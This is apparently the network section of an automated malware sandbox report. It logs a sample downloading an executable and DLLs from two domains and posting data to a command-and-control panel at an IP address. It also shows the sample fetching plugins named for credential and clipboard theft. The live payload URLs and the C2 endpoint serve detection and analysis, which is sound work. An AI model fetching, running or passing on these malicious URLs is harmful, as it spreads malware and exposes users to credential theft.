Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
haisatatakarya.com | 5.181.216.116 | |
africatechs.com | 172.67.140.104 |
GET
200
https://africatechs.com/YoutubeAdvert.exe
REQUEST
RESPONSE
BODY
GET /YoutubeAdvert.exe HTTP/1.1
Connection: Keep-Alive
Host: africatechs.com
HTTP/1.1 200 OK
Date: Wed, 14 Jun 2023 10:26:31 GMT
Content-Type: application/x-msdownload
Content-Length: 3467264
Connection: keep-alive
Last-Modified: Wed, 07 Jun 2023 13:43:24 GMT
ETag: "34e800-5fd8a51db468f"
Vary: User-Agent
Cache-Control: max-age=14400
CF-Cache-Status: REVALIDATED
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n%2FILkclgPfoWYUKuZsdW%2BoB%2BN%2FMujksnB8kSKmwzQaSg39pQF%2FGUfJR19UAIUz79FRw9yRbrBYNHPy901RH%2Fy8h89kbm4VpIEDVlLxf6mOcSTg8ddZBm9isp3BapS1gR4Vo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7d71e0206c6c1a06-KIX
alt-svc: h3=":443"; ma=86400
POST
200
http://62.182.156.152/so57Nst/index.php?scr=1
REQUEST
RESPONSE
BODY
POST /so57Nst/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODcwMTQ=
Host: 62.182.156.152
Content-Length: 87166
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 14 Jun 2023 10:26:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://62.182.156.152/so57Nst/index.php
REQUEST
RESPONSE
BODY
POST /so57Nst/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.182.156.152
Content-Length: 90
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 14 Jun 2023 10:26:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://haisatatakarya.com/64.dll
REQUEST
RESPONSE
BODY
GET /64.dll HTTP/1.1
Host: haisatatakarya.com
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: application/x-msdownload
last-modified: Wed, 07 Jun 2023 12:57:14 GMT
accept-ranges: bytes
content-length: 3700936
date: Wed, 14 Jun 2023 10:26:23 GMT
server: LiteSpeed
x-powered-by: Niagahoster
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
vary: User-Agent
POST
200
http://62.182.156.152/so57Nst/index.php
REQUEST
RESPONSE
BODY
POST /so57Nst/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.182.156.152
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 14 Jun 2023 10:26:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
301
http://africatechs.com/YoutubeAdvert.exe
REQUEST
RESPONSE
BODY
GET /YoutubeAdvert.exe HTTP/1.1
Host: africatechs.com
HTTP/1.1 301 Moved Permanently
Date: Wed, 14 Jun 2023 10:26:29 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 14 Jun 2023 11:26:29 GMT
Location: https://africatechs.com/YoutubeAdvert.exe
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HAGJROlUFt3FE%2BNlR4%2FOLiwFzCF5yMxWZOVTUQnqOVqHF7GXK%2B7MIAs4gRuz%2BC4zIWevIP4eckH1CimBiIZPXwzhB%2FRvVIB5EcsV64UhKqKM87wAziU0HgWkS%2BFY0%2BuACjQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7d71e01688e519f5-KIX
alt-svc: h3=":443"; ma=86400
POST
200
http://62.182.156.152/so57Nst/index.php
REQUEST
RESPONSE
BODY
POST /so57Nst/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.182.156.152
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 14 Jun 2023 10:26:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://62.182.156.152/so57Nst/Plugins/cred64.dll
REQUEST
RESPONSE
BODY
GET /so57Nst/Plugins/cred64.dll HTTP/1.1
Host: 62.182.156.152
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 14 Jun 2023 10:27:12 GMT
Content-Type: application/octet-stream
Content-Length: 1088512
Last-Modified: Wed, 31 May 2023 16:53:48 GMT
Connection: keep-alive
ETag: "64777b9c-109c00"
Accept-Ranges: bytes
GET
200
http://62.182.156.152/so57Nst/Plugins/clip64.dll
REQUEST
RESPONSE
BODY
GET /so57Nst/Plugins/clip64.dll HTTP/1.1
Host: 62.182.156.152
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 14 Jun 2023 10:27:14 GMT
Content-Type: application/octet-stream
Content-Length: 91136
Last-Modified: Wed, 31 May 2023 16:53:50 GMT
Connection: keep-alive
ETag: "64777b9e-16400"
Accept-Ranges: bytes
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49179 104.21.46.153:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | b4:d4:31:ca:e7:af:db:25:ee:bd:ac:39:b6:7f:82:90:e4:8c:6e:11 |
Snort Alerts
No Snort Alerts